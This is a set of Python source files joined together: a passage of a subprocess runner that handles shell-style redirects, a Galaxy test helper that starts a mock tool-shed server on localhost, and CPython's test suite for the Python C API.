RunProcessInfo = namedtuple('RunProcessInfo', ['process_name', 'argv', 'redirect_open_mode', 'redirect_path', 'stderr_means_err'])
list_of_process_to_run_with_redirects = list()
# find redirects
for run_process_info in list_of_argv:
stderr_means_err = True
if "2>&1" in run_process_info:
stderr_means_err = False
run_process_info.remove("2>&1")
if len(run_process_info) >= 3 and run_process_info[-2] in (">", ">>"):
list_of_process_to_run_with_redirects.append(RunProcessInfo(process_name=run_process_info[0].strip(),
argv=run_process_info[1:-2],
redirect_open_mode={">": "w", ">>": "a"}[run_process_info[-2]],
redirect_path=run_process_info[-1],
stderr_means_err=stderr_means_err))
else:
list_of_process_to_run_with_redirects.append(RunProcessInfo(process_name=run_process_info[0].strip(),
argv=run_process_info[1:],
redirect_open_mode=None,
redirect_path=None,
stderr_means_err=stderr_means_err))
for run_process_info in list_of_process_to_run_with_redirects:
redirect_file = None
if run_process_info.redirect_path:
redirect_file = open(run_process_info.redirect_path, run_process_info.redirect_open_mode)
print(run_process_info)
if run_process_info.process_name.lower() == "echo":
str_to_echo = " ".join(run_process_info.argv)
if redirect_file:
redirect_file.write(f"{str_to_echo}\n")
else:
sys.stdout.write(f"{str_to_echo}\n")
else:
log.info(f"Start running {run_process_info.process_name} with argv {run_process_info.argv}")
with Subprocess(run_process_info.process_name,
*run_process_info.argv,
out_file=redirect_file,
stderr_means_err=run_process_info.stderr_means_err,
own_progress_count=0) as sub_proc:
sub_proc()
log.info(f"Done running {run_process_info.process_name} with argv {run_process_info.argv}")
if redirect_file:
redirect_file.close()
|
shed_app_test_utils.py
|
from collections import namedtuple
import contextlib
import shutil
import socket
from time import time as now
from tempfile import mkdtemp
import threading
from requests import post
from werkzeug.serving import run_simple
from .shed_app import (
app,
InMemoryShedDataModel,
)
from galaxy.util.sockets import unused_port
DEFAULT_OP_TIMEOUT = 2
def mock_model(directory):
return InMemoryShedDataModel(
directory
).add_category(
"c1", "Text Manipulation"
).add_category(
"c2", "Sequence Analysis"
).add_category(
"c3", "Tool Dependency Packages"
)
def setup_mock_shed():
port = unused_port()
directory = mkdtemp()
model = mock_model(directory)
def run():
app.debug = True
app.config["model"] = model
run_simple(
'localhost',
port,
app,
use_reloader=False,
use_debugger=True
)
t = threading.Thread(target=run)
t.start()
wait_net_service("localhost", port, DEFAULT_OP_TIMEOUT)
return MockShed("http://localhost:%d" % port, directory, t, model)
# code.activestate.com/recipes/576655-wait-for-network-service-to-appear
def wait_net_service(server, port, timeout=None):
""" Wait for network service to appear
@param timeout: in seconds, if None or 0 wait forever
@return: True of False, if timeout is None may return only True or
throw unhandled network exception
"""
s = socket.socket()
# Following line prevents this method from interfering with process
# it is waiting for on localhost.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout:
end = now() + timeout
while True:
try:
if timeout:
next_timeout = end - now()
if next_timeout < 0:
return False
else:
s.settimeout(next_timeout)
s.connect((server, port))
except socket.timeout:
# this exception occurs only if timeout is set
if timeout:
return False
except socket.error:
pass
else:
s.close()
return True
@contextlib.contextmanager
def mock_shed():
mock_shed_obj = None
try:
mock_shed_obj = setup_mock_shed()
yield mock_shed_obj
finally:
if mock_shed_obj is not None:
mock_shed_obj.shutdown()
def _shutdown(self):
post("%s/shutdown" % self.url)
self.thread.join(DEFAULT_OP_TIMEOUT)
shutil.rmtree(self.directory)
MockShed = namedtuple("MockShed", ["url", "directory", "thread", "model"])
MockShed.shutdown = _shutdown
__all__ = ["setup_mock_shed", "mock_shed"]
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exception(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
orig_sys_exception = sys.exception()
orig_exception = _testcapi.set_exception(new_exc)
new_sys_exception = sys.exception()
new_exception = _testcapi.set_exception(orig_exception)
reset_sys_exception = sys.exception()
self.assertEqual(orig_exception, e)
self.assertEqual(orig_exception, raised_exception)
self.assertEqual(orig_sys_exception, orig_exception)
self.assertEqual(reset_sys_exception, orig_exception)
self.assertEqual(new_exception, new_exc)
self.assertEqual(new_sys_exception, new_exception)
else:
self.fail("Exception not raised")
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then calls
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-2)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, B.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
@threading_helper.requires_working_threading()
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
